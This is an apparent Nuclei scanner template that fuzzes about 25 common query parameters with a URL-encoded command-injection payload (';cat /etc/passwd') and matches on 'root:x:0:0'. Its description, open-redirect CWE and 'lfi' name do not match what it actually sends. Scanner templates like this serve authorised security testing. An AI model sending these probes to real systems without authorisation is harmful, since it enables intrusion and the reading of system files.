http:
- headers:
    Host: localhost
  matchers:
  - condition: or
    type: word
    words:
    - root:x:0:0
  method: GET
  path:
  - '{{BaseURL}}?cmd=%3Bcat%20%2Fetc%2Fpasswd&exec=%3Bcat%20%2Fetc%2Fpasswd&command=%3Bcat%20%2Fetc%2Fpasswd&execute=%3Bcat%20%2Fetc%2Fpasswd&ping=%3Bcat%20%2Fetc%2Fpasswd&query=%3Bcat%20%2Fetc%2Fpasswd&jump=%3Bcat%20%2Fetc%2Fpasswd&code=%3Bcat%20%2Fetc%2Fpasswd&reg=%3Bcat%20%2Fetc%2Fpasswd&do=%3Bcat%20%2Fetc%2Fpasswd'
  - '{{BaseURL}}?func=%3Bcat%20%2Fetc%2Fpasswd&arg=%3Bcat%20%2Fetc%2Fpasswd&option=%3Bcat%20%2Fetc%2Fpasswd&load=%3Bcat%20%2Fetc%2Fpasswd&process=%3Bcat%20%2Fetc%2Fpasswd&step=%3Bcat%20%2Fetc%2Fpasswd&read=%3Bcat%20%2Fetc%2Fpasswd&function=%3Bcat%20%2Fetc%2Fpasswd&req=%3Bcat%20%2Fetc%2Fpasswd&feature=%3Bcat%20%2Fetc%2Fpasswd'
  - '{{BaseURL}}?exe=%3Bcat%20%2Fetc%2Fpasswd&module=%3Bcat%20%2Fetc%2Fpasswd&payload=%3Bcat%20%2Fetc%2Fpasswd&run=%3Bcat%20%2Fetc%2Fpasswd&print=%3Bcat%20%2Fetc%2Fpasswd'
id: 1lfi-8
info:
  author: xandsz
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  description: 'Verifica parametros ocultos que refletem dentro do HTML da pagina

    '
  metadata:
    max-request: 2
  name: 1lfi
  severity: medium
  tags: fuzzer, generic
